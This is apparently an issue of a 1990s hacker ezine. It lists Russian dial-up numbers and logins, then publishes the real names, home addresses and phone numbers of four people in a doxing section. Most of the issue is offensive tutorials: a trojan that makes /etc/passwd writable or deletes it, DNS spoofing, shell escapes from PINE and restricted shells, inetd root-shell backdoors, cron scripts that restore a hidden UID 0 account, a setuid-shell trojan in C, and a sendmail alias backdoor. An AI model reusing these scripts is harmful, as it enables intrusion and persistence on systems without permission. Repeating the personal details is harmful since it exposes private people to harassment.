9676767 24400
9676730
9676731
9676732
9676733
9676734
9676735
9676755
9676759
9676763
9676766
9676784

9562455 SITA voice! phones
9564736

00wait5 ?p???????????? ????p STB Card.
00wait9 free information service

974 5122 Elvis+,Co Proxy 194.190.195.71.
961 5122 DNS 195.190.195.66.
SLIP login: iptest temp 192.168.12.1
PPP login: pptest
Password: guest

-----------------------------------------------------------------------
CentroNet DialUp www.astro.ru
-----------------------------------------------------------------------

7511704 14400

-----------------------------------------------------------------------
Infotel dialUps [02504]
-----------------------------------------------------------------------

9585475
9580226
9580825
9580575

-----------------------------------------------------------------------
MMTEL DialUPs [02503]
-----------------------------------------------------------------------

3371001 5 lines
2419860 .db
2418340
2461661

-----------------------------------------------------------------------
PTT-Teleport www.ptt.ru
-----------------------------------------------------------------------

946-9383 voice about x.25,28,etc
946-9393 modem PPP

-----------------------------------------------------------------------
www.dataforce.net
-----------------------------------------------------------------------

9566749 voice 2889340

-----------------------------------------------------------------------
FaxInfo Demo Tone Voice Line
-----------------------------------------------------------------------

9629424 demo user code : 12345

9759220 Telephone Voice Bulletin Board

-----------------------------------------------------------------------
Voice Mail boxes
-----------------------------------------------------------------------

7059285 leave me mail in 80718 box

9253503 Online registration 4 email
9253507

-----------------------------------------------------------------------
Strange #s :
-----------------------------------------------------------------------

2587474 Logon:
2586435
2586411
2586414
30
32
9269199

9500885

9563686

-----------------------------------------------------------------------
Demos 33.8 V34 HST
-----------------------------------------------------------------------

958-19-75
958-19-81
956-62-85
956-62-86
241-05-05
961-32-00

-----------------------------------------------------------------------
www.Cityline.ru V34
-----------------------------------------------------------------------

2587884 40 lines
9567759 20
2341901 10
2450070 10
2454414 10

9564787 Interport Mailbox ( t0ne )

9560050 Unknown system ( t0ne )

9585474 PassWord:

_always_ BUSY #s ( unpluged )
111-11xx
222-2222
980xxxxx
..
999xxxxx
-----------------------------------------------------------------------
INTEL PORT :
-----------------------------------------------------------------------

956-4787 Main
434-1565 Registration
202-6934 Demo

-----------------------------------------------------------------------
Dial-Ups
-----------------------------------------------------------------------

281-0201
975-0520
(37)

9270003 TYMUSA
956-3692 the same
956-0699 9600 Real Tymnet Voice 9563678
503/9563691 TYM-X25 Sync

-----------------------------------------------------------------------
Youth Science Center Linux server
-----------------------------------------------------------------------

Data lines: Line 1: 954-0664 (14400, 24h, UUPC only)
2: 954-0058 (14400, 21:00 - 09:00)
3: 954-0914 ( 9600, 21:00 - 09:00)
4: 954-0147 (33600, 24h, PPP only)
5: 954-0144 (33600, 24h, RAS only)
6: 954-0445 (33600, 24h, restricted)

Voice Dmitry Ablov 9540012

7473355 ASVT Dial Up Gateway 2 Users: Oleg & Alex

742xxxx Gate to Iskra2 line. Call for 8-097-2nodes
913xxxx Gate to Iskra2 line. Call for 8-097-3nodes

2324626 Comstar Dialup
2329696

9560885 "The Microsoft Network is no longer providing MSN in Russia"

-----------------------------------------------------------------------
-=-=-=-=-=-=-=-=-=-= Free 800 Services -=-=-=-=-=-=-=-=-=-=-
-----------------------------------------------------------------------

? Moscow #s

7473320 Rus MCI Operators in California
7473322 Eng connect me to Customer's Service in Russian
7473321 AT&T Operators in New-York
7473323
7473324 Sprint Global, Arizona, USA
7473325 Orua,Canada
7473326 Otele Code ?
7473327 National Calling Center, UK
28
7473329 Japan
7473356 Sprint Calling Cards
57
7473359 France service
60
7473361 Italian service
7473363 Chili ? service

? National Russian #s
8-10 800 4977211 - ???( AT&T);
8-10 800 4977222 - ???( MCI);
8-10 800 4977255 - ???( Sprint) ;
8-10 800 4977220 - ???(MCI ????????????? ??????);
8-10 800 4977233 - ?????? (Teleglob);
8-10 800 4977266 - ??????????????(BT);
8-10 800 4977277 - ??????????????( Mercuri);
8-10 800 4977288 - ???????;
8-10 800 4977181 - ?????? ( KDD);
8-10 800 4974358 - ?????????( Telecom Finland);
8-10 800 4977032 - ??????? (Belgacom, ? ????????-
?????? ????????);
8-10 800 4977212 - ??????? ( Belgacom, ????? ???-
??????);
8-10 800 4977039 - ?????? (Iritel);
8-10 800 4977353 - ???????? ( Telecom Iriland);
8-10 800 4977156 - ????;
8-10 800 4977165 - ????????;
8-10 800 4977141 - ?????????.

???????????????????????????????????????????????????????????????????????????????
===============================================================================
==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]==
===============================================================================
???????????????????????????????????????????????????????????????????????????????
1. sIn inf0z part 3 : The CodeZero + Friends
???????????????????????????????????????????????????????????????????????????????

sIn are 0fficially property of the CodeZero.

-------------------------------------------------------------------------------

Alias : Evil Chick
Real Name : Suzette Kimminau
Address : 130 105th Ave. S.E. Apt. 218
Bellevue, Wa 98004
USA

Telephone : (206)454-7176
Email : [email protected]

-------------------------------------------------------------------------------

Alias : \\StOrM\\
Real Name : Jason Sloderbeck
Address : 5739 N Norton,
Kansas City, MO 64119
USA

Telephone : (816)453-8722
Email : [email protected]

-------------------------------------------------------------------------------

Alias : JDKane
Real Name : Kim
Address : 327 E Park Road,
Round Lake, IL 60073
USA

Telephone : (847)546-9154
Email :

-------------------------------------------------------------------------------

Alias : JeNnYGrRl
Real Name : Jennifer Chambers
Address :
Kansas City, MO 61421
USA

Telephone :
Email :

-------------------------------------------------------------------------------

We got more, but not complete,

They can run, but they can never hide,

http://www.codez.com/inf0z.html

???????????????????????????????????????????????????????????????????????????????
2. The Codez That NASA Use : so1o
???????????????????????????????????????????????????????????????????????????????

w0wie, I got myself some eleet NASA system security juarez...And people have
leeched them from me, like lame undernet groups with no skill.

::: LaRCSCAN
::: NAIAD

---These Are The *EXACT* Files Taken From The nasatool.zip.gz I have----------

(readme.larcscan)

The LaRCSCAN program is a working prototype rather than a finished
product, thus requiring a few explanations.

SETTING UP
----------

LaRCSCAN is a combination of fifty script and c-language files.
(No need to compile the c code, the scripts will do it ). To set up
to run LaRCSCAN create a directory LARCSCAN in the users home directory.
Copy LARCSCAN.tar into this directory.

Do a tar -xf LARCSCAN.tar.
This will create a 'project' directory containing all the script
and 'C' files.

Next create a directory 'LARCSCAN/data' .
In this directory you wil create two files- 'hname1' and 'uname2'.
These should be plain ascii text files. The first (hname1) will
contain a list of all the target machine host names, one name per line.
Example:

viper
machine2
dumbo
(These may also use the longer format i.e. 'dumbo.larc.nasa.gov')

The second (uname2) should contain a list of standard vendor account
names you wish to check.
Example:

guest
tutor
4Dgifts
demo
demos
lp

There is an extensive list of these names in the file named 'acctlist'.
We normally run 6 to 8 of these each month, rotating through the list.
They are used in the 'rsh' attempts and using too many can cause the
process to be extremely slow.

Before running LaRCSCAN, there are several places code must be changed
to reflect the user, host and domain running the scan. The following
changes should be make:

FILE CURRENT TEXT REPLACEMENT
--- ----------- -----------

ftpsc 'jpark@bize' your username@your hostname
fptss 'jpark@bize' your username@your hostname
getftp.sh 'jpark@bize' your username@your hostname
getftpss.sh 'jpark@bize' your username@your hostname

ftpsc '#local=larc.nasa.gov' '#local='your complete domain
ftpss '#local=larc.nasa.gov' '#local='your complete domain
hostsljc '#local=larc.nasa.gov' '#local='your complete domain
rshss '#local=larc.nasa.gov' '#local='your complete domain
rshsc '#local=larc.nasa.gov' '#local='your complete domain
shownlj '#local=larc.nasa.gov' '#local='your complete domain

line.c 'strncmp(pl.hdr,"larc",n)' substitute the site portion of
your domainname (lerc,arc,jpl,etc)
for 'larc'

These changes are necessary in order for your results to be accurate.
The C code is compiled (by the script files) using cc with the -o
(next token is output file) option. If this compiler is not used on
the scanning machine, you should be able to substitute the appropriate
compiler command and option. Compilation occurs from:

exec1.sh
exec2.sh
rshsc
rshss
shownlj

RUNNING LaRCSCAN
----------------

LaRCSCAN can take quite a while (days) to run to completion, so it is
reccommended that it be run in the background mode. We do this either
with crontab starting it at a specified time/date or through the use of
'nohup'. The command that starts the process is 'sh tst1.sh' (in the
project directory). The necessary subdirectories and files will be
created as needed.

RESULTS
-------

The first report (LARCSCAN/result/result.db) is a summary of the
results from each target machine. It starts with the date the scan
began and the total number of target hosts. The next line is the
column header line, containing the following abbreviations:

HTNAME - hostname
HUK - host known (is the hostname an active host)
TFTP-trivial ftp (is the trivial ftp utility active on this host)
FTP-anonymous ftp (is anonymous ftp active on this host)
There can several valid responses in this column.
No-anonymous ftp is not active
Yes_No-anonymous ftp is active but no password file was captured.
Yes_Yes-anonymous ftp is active and a password file
was captured.
ALIAS-were the 'decode' or 'uudecode' aliases present in the
aliases file
SDM-was the 'wiz' password present in the sendmail.cf file
SHADOW-was the captured password file a shadow password file.
N/A used when no password file was captured.
(This is the only instance where 'Yes' is a desired result)

+LINE-Indicates a single '+' on a line by itself in the
hosts.equiv file

The second report (LARCSCAN/result/result2.db) is a list of all hosts
found to have accounts with no password, followed by the unprotected
account names. The ACCTS_OFF and OFF columns will be used to represent
host.equiv entries that are located off-site and target hosts located
off-site. Currently these entries are not valid!

The last report (LARCSCAN/result/resultr1.db ) contains a list of all
file systems exportable to the world.

Any specific questions or problems may be sent via E-mail to
[email protected].

(readme.naiad)

The NASIRC Automated Inode Anomaly Detector (NAIAD)
---------------------------------------------------
Copyright 1996 Hughes STX Corporation

This software was developed by Hughes STX Corporation for the National
Aeronautics and Space Administration under contract NAS5-30440. An
unlimited license for use within NASA is granted. Hughes STX
Corporation makes no representation concerning the suitability of this
software for any particular purpose. It is provided "as is" without
express or implied warranty of any kind.

Author: Fred Blonder <[email protected]>

NAIAD will traverse a specified directory and all its sub-directories,
looking for files meeting certain built-in criteria. If no directory
is specified, it starts at the current directory. Its purpose is to
find evidence of attempted or actual system tampering. The tests
performed cannot easily be performed by existing system commands such
as "find". NAIAD is intended to be used in conjunction with such
programs and checksumming programs.

The tests NAIAD performs are:

* Check for file names containing unprintable characters. These are
sometimes used to hide illicit programs, or the output from them.
They are also frequently created by fumble-fingered users, and are
not necessarily a sign of a problem.

Optionally, naiad will rename the file to something easier to type on
a normal keyboard.

* List symbolic links, or just symbolic links to files whose name
begins with a period. The exploitation of security holes in some
programs involves placing symbolic links into a spool directory.
NAIAD will help locate links in unexpected places.

* Lists old files whose inode has been altered recently. Some
malicious programs attempt to hide the fact that they have altered a
file by using the "utime" system call to alter the "last modified"
time of the file. The inode also contains the "inode changed" time,
which is not modifiable by this call; thus a file which has been
tampered to display an old modification time will still have a recent
"inode changed" time. Of course, this can also be caused by someone
using the "chmod" command. There are two parameters associated with
this: the "window" is the amount of time within which the
modification times may differ without being flagged, (default is 30
minutes, which can be changed); and "cutoff", which is the time
within which the inode must have been modified for the file to have
been flagged (default is to not show files whose inodes have not been
modified in the last week, which can be changed).

* Lists device files which are not under the /dev hierarchy, or ordinary
files that are.

* Lists any files or directories whose mtime, atime or ctime are later than
the current system time.

* Lists files which contain user-specified search-strings. This is
similar to the command:

find . -exec grep <string> '{}' ';' -print

but a little more efficient because there isn't a process started for
each file, and naiad can be made to search only part of each file.

The output format is:

MMM mmm iiiiiiiiii xxxxxxxxxxxxx: "<filename>"

...where "MMM" is the major device number, "mmm" is the minor device
number, "iiiiiiiii" is the inode number, "xxxxxxxxxxx" is a comment,
and "<filename>" is the pathname of the file. There may be additional
information appended to the line.

You will probably want to run as super-user so that NAIAD can access
the entire file system. It is passive, and will not alter anything it
finds.

More detailed information may be found in the "naiad.1" file, which is
part of the naiad tarfile.

---These Are The *EXACT* Files Taken From The nasa.zip.gz I have---------------

So, looks as if NASA has some pretty neato detection juarez to use, I wouldn't
advise anyone to hack any *.nasa.gov system without knowing how to obtain root
and having mad skills to counter-act these security measures, you have been
warned.

so1o.

???????????????????????????????????????????????????????????????????????????????
3. Rooting From Bin : so1o
???????????????????????????????????????????????????????????????????????????????

This is something I was thinking alot about the other day, I was on a System V
Release 4, I had just performed the chkperm exploit, which only gives
bin access (uid=1 and gid=1) to the system, so even though I own all the
files in the /bin/ directory, I am still not root. Here is a very very simple
technique I developed for such occasions, this may come in useful one day for
someone, somewhere...

Write a program that you can get people to run, you could get hold of the
source for a common program, such as su or who or mount. Put this line in
it somewhere:

if ( !strcmp(getlogin(),"root") ) system("whatever you want");

This checks to see if the root login is running your program. If he is, you
can have him execute any shell command you'd like. Here are some suggestions:

"chmod 666 /etc/passwd"

/etc/passwd is the system's password file. The root owns this file.
Normally, everyone can read it (the passwords are encrypted) but only the root
can write to it. Take a look at it and see how it's formatted if you don't
know already. This command makes it possible for you to now write to the file

- i.e. create unlimited accounts for yourself and your friends.

"chmod 666 /etc/group"

By adding yourelf to some high-access groups, you can open many doors.

"chmod 666 /usr/lib/uucp/L.sys"

Look for this file on your system if it is on the uucp net. It contains
dialups and passwords to other systems on the net, and normally only the uucp
administrator can read it. Find out who owns this file and get him to
unknowingly execute a program to unlock it for you.

"rm /etc/passwd"

If you can get the root to execute this command, the system's passwd file
will be removed and the system will go down and will not come up for some time
to come. This is very destructive and evil, but pointless, if you do want to
damage a system, at least use your imagination.

If you are going to go about adding a trojan horse program to the system,
there are some rules you should follow. If the hidden purpose is something
major (such as unlocking the user's mbox or deleting all of his files or
something) this program shouldn't be a program that people will be running a
lot (such as a popular computer game) - once people discover that their files
are public access the source of the problem will be discovered quite easily.
Save this purpose for a 'test' program (such as a game you're in the process
of writing) that you ask individual people to run via mail or 'chatting' with
them. As I said, this 'test' program can bomb or print a phony error message
after completing its task, and you will just tell the person "well, I guess
it needs more work", wait until they log off, and then read whatever file of
theirs that you've unlocked. If your trojan horse program's sole purpose is
to catch a specific user running it - such as the root or other high-powered
user - you can put the code to do so in a program that will be run a lot by
various users of the system. Your modification will remain dormant until he
runs it. If you cant find the source to 'star trek' or whatever in C, just
learn C and convert something from pascal. It can't hurt to learn C as it's a
great language. We've just seen what it can do on a UNIX system. Once you've
caught the root (i.e. you can now modify the /etc/passwd file) remove the
spurious code from your trojan horse program and you'll never be caught.

so1o.

???????????????????????????????????????????????????????????????????????????????
4. DNS Spoofing : so1o
???????????????????????????????????????????????????????????????????????????????

You can now use a new DNS spoofing technique originally developed by johan,
I have seen this technique often applied to IRC, and prym was one of the first
to use the technique for that purpose.

Here is a basic introduction into the DNS concept.
--------------------------------------------------

DNS stands for Domain Name Server although you may hear it refered to as
Dynamic Name Server. DNS servers are used so that instead of everyone having
numeric IP's for their websites and shit, they can use a DNS so that a client
can 'lookup' the name (eatme.com for example) to the numeric IP.

Basically, a DNS server is a computer which is running a nameserver daemon
typically listening on UDP port 53. When a new domain is setup the domain is
registered with Internic. Internic then tells its clients who has authority
over the domains registered with it.

For example say 1.2.3.4 wanted to resolve the address for peachie.com and
1.2.3.4's nameserver was 1.3.3.7. 1.2.3.4 would ask 1.3.3.7 what the numeric
IP for peachie.com was, so 1.3.3.7 would ask internic who had authority over
peachie.com and internic might reply with ns.peachie.com. So then 1.3.3.7
would ask ns.peachie.com what the numeric IP for peachie.com was.
Then ns.peachie.com would tell 1.3.3.7 that the numeric IP for peachie.com
was 4.3.2.1 and then 1.3.3.7 would then tell 1.2.3.4 the numeric IP and the
name would be resolved.

DNS servers generally cache addresses that are looked up by its clients.
So if 1.2.3.4 were to ask 1.3.3.7 what the address for taco.com was again,
1.3.3.7 would not ask Internic etc. instead it would take the IP that it had
previously resolved earlier and say that the numeric IP for peachie.com is
4.3.2.1. the funny part is that the DNS server doesn't do alot of checking
when another nameserver replies to its query. It basically just tells the
client what is was told at an earlier point and caches it in the same way.
This is why we can spoof using such a technique, but we would need root
access to a nameserver first, this is one of the biggest setbacks...

How to spoof your DNS.
----------------------

Lets say were sitting on ns.peachie.com with root, and we have authority
for all of peachie.com. we want to cache our boxs address 2.2.2.2 on the
remote nameserver ns.eatme.org so that we can connect to eatme.org with the
address of trusted.eatme.org. We could write a program that listens for DNS
queries and replies with false information. sitting on ns.peachie.com we
could lookup peachie.com on the nameserver ns.eatme.org. ns.eatme.org would
ask Internic who had authority for peachie.com and it would reply to
ns.eatme.org that ns.peachie.com had authority over peachie.com. Then
ns.eatme.org would ask ns.peachie.com what the address for peachie.com was.

If we were running a normal DNS then it would tell ns.eatme.org that the
address for peachie.com was 4.3.2.1. but we aren't. We'll say that
ns.peachie.com tells ns.eatme.org that the reverse of 2.2.2.2 is
trusted.peachie.com and the address for trusted.peachie.com is 2.2.2.2.
This exploits the failure to check a few things on the DNS.

Basically ns.eatme.org asked what the numeric IP for peachie.com was and we
told it that the reverse of 2.2.2.2 is trusted.eatme.org and that the IP
of trusted.eatme.org is 2.2.2.2. They asked a question to which we responded
with two awnsers to different question entirely. Now we would simply connect
to eatme.org from 2.2.2.2 and eatme.org would ask ns.eatme.org for the reverse
of 2.2.2.2 and in its cache it would find trusted.eatme.org and it would reply
with that answer. Then it would ask for the address of trusted.eatme.org and
it would reply with 2.2.2.2. you would then be connected to eatme.org
from trusted.eatme.org and in effect DNS spoofing.

That's all there is to it, it may be a bit heavy for some people.

so1o

???????????????????????????????????????????????????????????????????????????????
5. FreeNet : TrN
???????????????????????????????????????????????????????????????????????????????

Breaking security on restricted shells and freenets.

What many system administrators fail to realize is that by setting up shells
and security on their applications and systems, and generally trying to lock
users in a freenet menu environment, it is almost impossible to fully examine
every program. Many programs allow you to escape to shells, even in secure mode,
especially the older ones. There is a longstanding bug in the gohper
application, used by many freenets, that allows you to start up a gopher server,
where an entry is created such as ";sh". Following this entry provides a shell.
This is the main reason why the original gopher client is no longer in use.
A "l;rm -rf *" was just as easy.

In todays world, the biggest problem is that freenets usually allow you to edit
files. If this is the case, you almost have a 100% chance of you getting into
a real shell. What you first have to do is see if you can go through the menu
system to edit a file. If you can't that is cool too. We are going to show you
how to get a shell out of PINE. It doesn't matter which version, this works all
the way up to 3.96. Anyway, like I was saying, you should see if you can either
a) edit a file, or b) upload a file. I'm almost sure you can do either.
So, lets start a little session here. First, you have to edit your .pinerc.
If you can't, download it (or get it from the PINE package), make the changes,
and reupload it. What is important is that you edit the feature-list=commands,
and have it read something similar to this:

feature-list=enable-alternate-editor-cmd,
enable-unix-pipe-cmd

After setting this correctly, go further in the file, and until you find the
editor= command. It is stated that the editor is normally set to sh, and
invoked via _^ [Control-Shift-Dash]. Do you get the idea yet?
Set the line to read editor=sh and then save the file. Now for the fun part.
Start up pine, and chose Compose Message. Erase all the To/Cc/Att/Sub headers,
and make the message text blank, except for the work "sh" (without the quotes)
on a single line. After this is done, press the alternate editor hotkey (^_).
Here is what happens:

To :
Cc :
Attchmnt:
Subject :
----- Message Text -----
sh
$

Kinda neat. That little $ is the sign that it all worked. What you probably
want to do is execute some of the standard commands that tell you a little
about where you are:

$ uname -a ; uptime ; /sbin/ifconfig -a
SunOS pb 4.1.3_U1 1 sun4m
12:14am up 47 days, 12:18, 24 users, load average: 2.71
le0: flags=63<UP,BROADCAST,NOTRAILERS,RUNNING>
inet 199.227.192.35 ffffff00 199.227.192.0
lo0: flags=49<UP,LOOPBACK,RUNNING>
inet 127.0.0.1 ff000000

Then a w ; ps -aux would be nice. It can tell you a little about what is going
on, and what is safe to do the things you want. You should probably log on
late at night, compile slirp if it is only a shell/vt dialin, and then check
the system for vunerabilities, unshadowed passwords, etc. I've notified my
freenet of their problems, but they don't seem to care. Maybe now they will.
Ok sysadmins, fix up your freenets, and hackers... Hack the planet. :-)

This article by TrN of The CodeZero. I'll have more interesting information
on the way. You can get ahold of me at http://bluebox.dyn.ml.org:8000, or by
e-mail at [email protected]. You should check out the web
page, as it has other security related information. LaterZ.

One other thing to consider, if ports 514 / 512 are open, then you can try
creating an .rhosts file in your home directory containing "+ +", then use..

rsh -l loginhere systemhere.com csh -i

...and you will get a shell -- so1o

???????????????????????????????????????????????????????????????????????????????
6. Backdoors Revised : Blk-Majik
???????????????????????????????????????????????????????????????????????????????

Disclamer:

If you do anything mentioned in this article, it is your own fault and any
trouble you manage to get into is your own responsibility, not mine.
But what am I thinking...like any of you lamers can root a shell :).

gr33tz:

A big wuzzup to cf, oK, oa, and gZ! Keep it kewl, madmax, imunknown, pack,
plum, mogle, crytpo`, so1o, c0d, and da rest of muh boys! Thanx to mcooly for
making this document possible and helping me out!

=============================================================================
section 1:
=============================================================================

What is a back door? :

Well, kiddies, a backdoor is just a way to remotely get into a shell without
being noticed or sometimes logged. This can be done by adding a extra telnet
port to the server I will show you a few ways to set up the port, and also
how to keep it up even after the admin find it.
so1o had a section in a back issue with a back door using the inetd.conf
file where you had to end all commands with a ";". Well that annoyed the
hell out of me so I have modified his technique.

=============================================================================
section 2:
=============================================================================

What you need :

Basically, you need root on a shell to start (and a Unix based OS).
After that, you will need a good editor....say pico or vi. Most of you
#shells wh0res need, but lack this important ingredient....a fucking brain.

=============================================================================
section 3:
=============================================================================

Understanding the technique :

After you checked your head, editor, whoami, etc, you are all set. Ok, this
is what you look for:

/etc/services This file lets you find a port
/ect/inetd.conf This is where the backdoor will be

ok, in the /etc/services file, you will see something like this:

tcpmux 1/tcp #TCP Port Service Multiplexer
tcpmux 1/udp #TCP Port Service Multiplexer
compressnet 2/tcp #Management Utility
compressnet 2/udp #Management Utility
compressnet 3/tcp #Compression Process
compressnet 3/udp #Compression Process

ok, what the fuck is that? ill explain it with this example:

ftp 21/tcp #File Transfer [Control]
ftp 21/udp #File Transfer [Control]

[1] [2]/[3] #[ 4 ]

1: The name of the service of the system.
2: The port that the system uses for the service.
3: The protocol (going to be tcp. You can chose either tcp or udp.)
4: A description of what the service is used for.

Aight, thats the service file...you will need this later.

now look at the /etc/inetd.conf file. the inetd is a Internet daemon that
will listen for tcp requests and UDP prots and then spaws the program when a
connection request is made.

It will look like this:

ftp stream tcp nowait root /usr/libexec/tcpd ftpd -l -A
telnet stream tcp nowait root /usr/libexec/tcpd telnetd
shell stream tcp nowait root /usr/libexec/tcpd rshd
login stream tcp nowait root /usr/libexec/tcpd rlogind -a
exec stream tcp nowait root /usr/libexec/tcpd rexecd

let me explain it:

ftp stream tcp nowait root /usr/libexec/tcpd ftpd -l -A
[1] [ 2 ] [3] [ 4 ] [ 5 ] [ 6 ] [ 7 ]

1: Name of deamon in the services file. It tells inetd what to look for in
/etc/services to see what port to use when connecting.
2: Type of of socket connection that the deamon will accept.
3: Protocol field which is always TCP or UDP.
4: How long to delay connection.
5: User to run on the deamon as (used with uid/gid permissions etc.)
6: What program will keep the connection.
7: The actual command or daemon.

Ok, so what that dose it makes a port for telnet (port 21, as defined in the
services file). It has a stream/tcp connection and dosn't wait for a prompt.
The user is of root access and uses /ur/libexec/tcpd (but limited commands)

Ok, now u know what the shit is for, next step...

=============================================================================
section 4:
=============================================================================

Installing the backdoor :

Backdoor I : Using /etc/inetd.conf and /etc/services
----------------------------------------------------

method 1 :
----------

ok, now go back to the /etc/services file. Look at it and find a service you
think the admin will not notice, and that is not in use. remember the name
of the service. Now, go to the inetd.conf file. Go to a place with all the
services name where the 1 is in the above example. Add you service somewhere
so it is hidden within others. For 2, put the port of the service. 3 is tcp,
duh. 4 is nowait. 5 will be root, so u get root access. 6 is going to be
/bin/sh or what ever you like. 7 has to be 6 -i..ex: if 7 is /bin/sh,
7 is /bin/sh -i

here is an example:

ftp stream tcp nowait root /bin/sh sh -i

Ok, now you have to restart the inetd. do this by typing (as root) :

killall -HUP inetd

Ok, now lets test it. From a different system...

telnet victum.server.com 21
Trying 123.456.78.9...
Connected to comp.com
Escape character is '^]'.
bash#
bash# whoami
root
bash#

tip:

do NOT use the ftp port...it is just used to often. Pick a service that is
not use alot. It will help you keep the backdoor running.

method 2:
---------

If you are willing, you can add your own service to the service file.
This is easy..say you service file is like this:

netbios-ssn 139/tcp nbssn
imap 143/tcp # imap network mail protocol
NeWS 144/tcp news # Window System
snmp 161/udp

ok, look at the ports.....see how they skip a few? well lets fill 1 of them
up...

netbios-ssn 139/tcp nbssn
suled 142/tcp suled
imap 143/tcp # imap network mail protocol
NeWS 144/tcp news # Window System
snmp 161/udp

Notice the suled service...that I added that to the /etc/services.

Ok, now to the /etc/inetd.conf file:

ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
gopher stream tcp nowait root /usr/sbin/tcpd gn

...Here we go!!

ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
gopher stream tcp nowait root /usr/sbin/tcpd gn
suled stream tcp nowait root /bin/sh sh -i

Ok, now restart inetd like i said how to before...

You're all set, telnet localhost <port u set> and test it!@~#

Backdoor II: Da beauty of CRON
-------------------------------

Ok, cron trojans are good for keeping root if the admin kills the backdoor.
A Cron is a timed daemon. It consits of hours, minutes, etc. It will make the
system automatically issue a command on the shell at a given time of your
choice... Type crontab in the shell. It will tell you how to list, run and
remove crons. You will like to look at the /var/spool/cron/crontabs/root.
This is what the crons will look like:

0 0 * * 1 /usr/bin/updatedb
[1] [2] [3] [4] [5] [ 6 ]

1: munute, 0-59
2: hour, 0-23
3: day of month, 1-31
4: month of yeat, 1-12
5: day of week, 0-6
6: command to execute

The example above is issued on monday's. If you want to exploit the cron,
simply add an cron line to the /var/spool/crontab/root.

ie: If you use the UID 0 account (as seen later), you can make a cron to
see if the UID 0 account is still alive. If root killed it, the cron can
re-add it!

...This will make the UID 0 account, just for back-up:

Cron #1
-------

newuser.sh
----------

#!/bin/sh
# Inserts a UID 0 account into the middle of the passwd file.
# There is likely a way to do this in 1/2 a line of AWK or SED. Oh well.
# [email protected]

set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
echo passwd file has $linecount[1] lines.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
echo Creating two files, $linecount[1] lines each \(or approximately that\).
split -$linecount[1] ./temppass # passwd string optional
echo "YourUser::0:0:Mr. Hacker:/home/hacker:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...

*** NOTE : MODIFY THE ECHO "YOURUSER..." PART!!

Here is a script that kinda does the same thing, but instead of making a new
account, it will look for an old, disabled account and enable it just for you :

dead.sh
-------

#!/bin/sh
# Everyone's favorite...

cp /bin/csh /tmp/.yourlittleshell # Don't name it that...
chmod 4755 /tmp/.yourlittleshell

Ok, here is where the cron comes in. It will look in the passwd files to
check if you YouUser is still alive. If not, it brings him back!

revive.sh
---------

#!/bin/sh
#Is YourUser still on the system? Let's make sure he is.
#[email protected]

set evilflag = (`grep eviluser /etc/passwd`)

if($#evilflag == 0) then # Is he there?

set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
split -$linecount[1] ./temppass # passwd string option
echo "YourUser::0:0:Mr. Hacker:/home/hacker:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
else
endif

cron #2
-------

First of all, you will need a copy of the /etc/passwd file in a hidden
location. For this example, we will use /var/spool/mail/.hidepass. We have
one entry in it that will be are root account we will use. Then lets make a
cron that will save a copy of the real /etc/passwd file and install the hidden
passwd file as the real one for 1 minute at a time of your choice. Make it
at a slow time of day because any one who tries to access the passwd file
durring this minute will get an error. 4:30 am is a good time. Put this in
the roots cron to do this :

29 4 * * * /bin/usr/hidenhidenpass

..make sure this exist

#echo "root:1234567890123:0:0:Operator:/:/bin/csh" > /var/spool/mail/.hidden

here is the /bin/usr/hidenhidenpass

.hidden
-------

#!/bin/sh
# Install trojan /etc/passwd file for one minute
#[email protected]
cp /etc/passwd /etc/.temppass
cp /var/spool/mail/.sneaky /etc/passwd
sleep 60
mv /etc/.temppass /etc/passwd

Cron #3
--------

This is a c script that will work like the above. Cron it as root like as
above and just let this file load every day.

hidden.c
--------

#include<stdio.h>

#define KEYWORD "industry3"
#define BUFFERSIZE 10

int main(argc, argv)
int argc;
char *argv[];{

int i=0;

if(argv[1]){ /* we've got an argument, is it the keyword? */

if(!(strcmp(KEYWORD,argv[1]))){

/* This is the trojan part. */
system("cp /bin/csh /bin/.swp121");
system("chown root /bin/.swp121");
system("chmod 4755 /bin/.swp121");
}

}
/* Put your possibly system specific trojan
messages here */
/* Let's look like we're doing something... */
printf("Sychronizing bitmap image records.");
/* system("ls -alR / >& /dev/null > /dev/null&"); */
for(;i<10;i++){
fprintf(stderr,".");
sleep(1);
}
printf("\nDone.\n");
return(0);
} /* End main */

=============================================================================
section 5:
=============================================================================

Sendmail backdoor :
-------------------

With this, you have to edit the /etc/aliases file. add this line:

decode: |/usr/bin/uudecode

make sure u hide it in their so it aint odvious :). the uudecode file will
be a .rhosts file with the full pathname embedded.

here is the script:

uudecode.sh
-----------

#!/bin/sh
# Create our .rhosts file. Note this will output to stdout.

echo "+ +" > tmpfile
/usr/bin/uuencode tmpfile /root/.rhosts

Ok, now telnet to victumserver.com at port 25. Fakemail to decode and use as
the subject body, the uuencoded version of the .rhosts file. Here is an easy
one (but not fake):

echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail [email protected]

You can add any program that I have listed to be ran from the alias, so be as
creative as u want! :)

=============================================================================
section 6:
=============================================================================

Others :

Here is one of the best trojans I have seen. It is sneeky and only detectable
by programs like tripwire. All you have to do is put the trojan code into a
the source of some popular system programs. su, login, and passwd are very
good to add it to because they run a SUID root and don't have strict
permission so you can modify it. This will tell you what to do after u get
the source code for the particular UNIX system you are backdooring. If you
can't get the source for any programs on your system, u may be screwed :(.
You can find trojaned versions of many programs, here is a small example
of pseudo-code that is added in such programs...

get input;
if input is special hardcoded flag, spawn evil trojan;
else if input is valid, continue;
else quit with error;
...

=============================================================================
section 7:
=============================================================================

Keeping the backdoor :

Well, the best advice I can possibly give to start off is to cover your
tracks. If the admin doesn't know he's been hacked, he won't look for
backdoors to remove. This will totaly depend on the admins ability to find
backdoors and know how to get rid of them.

